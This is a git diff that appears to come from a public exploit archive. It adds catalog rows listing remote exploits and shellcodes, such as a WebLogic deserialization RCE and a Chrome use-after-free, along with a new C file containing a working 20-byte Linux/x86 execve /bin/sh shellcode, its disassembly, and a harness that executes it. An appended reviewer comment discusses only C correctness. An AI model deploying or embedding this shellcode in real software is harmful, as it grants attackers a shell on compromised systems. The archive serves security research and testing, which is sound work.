 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17384,6 +17386,10 @@ id,file,description,date,author,type,platform,port
 46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
 46795,exploits/hardware/remote/46795.rb,"LG Supersign EZ CMS - Remote Code Execution (Metasploit)",2019-05-06,"Alejandro Fanjul",remote,hardware,9080
 46797,exploits/windows/remote/46797.py,"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)",2019-05-06,ElSoufiane,remote,windows,80
+46808,exploits/windows/remote/46808.py,"Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE)",2019-05-08,"Charles Truscott",remote,windows,143
+46812,exploits/windows_x86/remote/46812.rb,"Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)",2019-05-08,Metasploit,remote,windows_x86,
+46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432
+46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41234,3 +41240,4 @@ id,file,description,date,author,type,platform,port
 46798,exploits/php/webapps/46798.txt,"PHPads 2.0 - 'click.php3?bannerID' SQL Injection",2019-05-06,"felipe andrian",webapps,php,80
 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
+46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 7ed17ea82..f3f795aff 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -963,3 +963,4 @@ id,file,description,date,author,type,platform
 46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
 46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
+46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
diff --git a/shellcodes/linux_x86/46809.c b/shellcodes/linux_x86/46809.c
new file mode 100644
index 000000000..acb36488d
--- /dev/null
+++ b/shellcodes/linux_x86/46809.c
@@ -0,0 +1,31 @@
+/*
+# Linux/x86 - execve /bin/sh shellcode (20 bytes)
+# Author: Rajvardhan
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 20
+
+Disassembly of section .text:
+
+08049000 <.text>:
+ 8049000: 31 c9 xor %ecx,%ecx
+ 8049002: 6a 0b push $0xb
+ 8049004: 58 pop %eax
+ 8049005: 51 push %ecx
+ 8049006: 68 2f 2f 73 68 push $0x68732f2f
+ 804900b: 68 2f 62 69 6e push $0x6e69622f
+ 8049010: 89 e3 mov %esp,%ebx
+ 8049012: cd 80 int $0x80
+
+===============poc by Rajvardhan=========================
+*/
+
+#include 
+#include 
+
+unsigned char shellcode[] = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+main()
+{
+printf("Shellcode Length: %d\n", strlen(shellcode));
+int (*ret)() = (int(*)())shellcode;
+ret();
+}
\ No newline at end of file
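Review bot: `main()` is declared with no return type, which relies on implicit int and has not been valid C since C99, and `printf("Shellcode Length: %d\n", strlen(shellcode))` passes a `size_t` to `%d`, which is undefined behaviour even where it happens to print the right number on a 32-bit build; `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(shellcode));` fix both. The conversion `(int(*)())shellcode` from an object pointer to a function pointer is not defined by ISO C either, so a one-line comment should say the harness is compiler-specific. The two `#include` directives have lost their header names on this page, so I could not confirm that both `<stdio.h>` and `<string.h>` are present. The header's "20 bytes" claim matches the string literal on the `shellcode[]` line and the disassembly, so that part of the documentation is consistent.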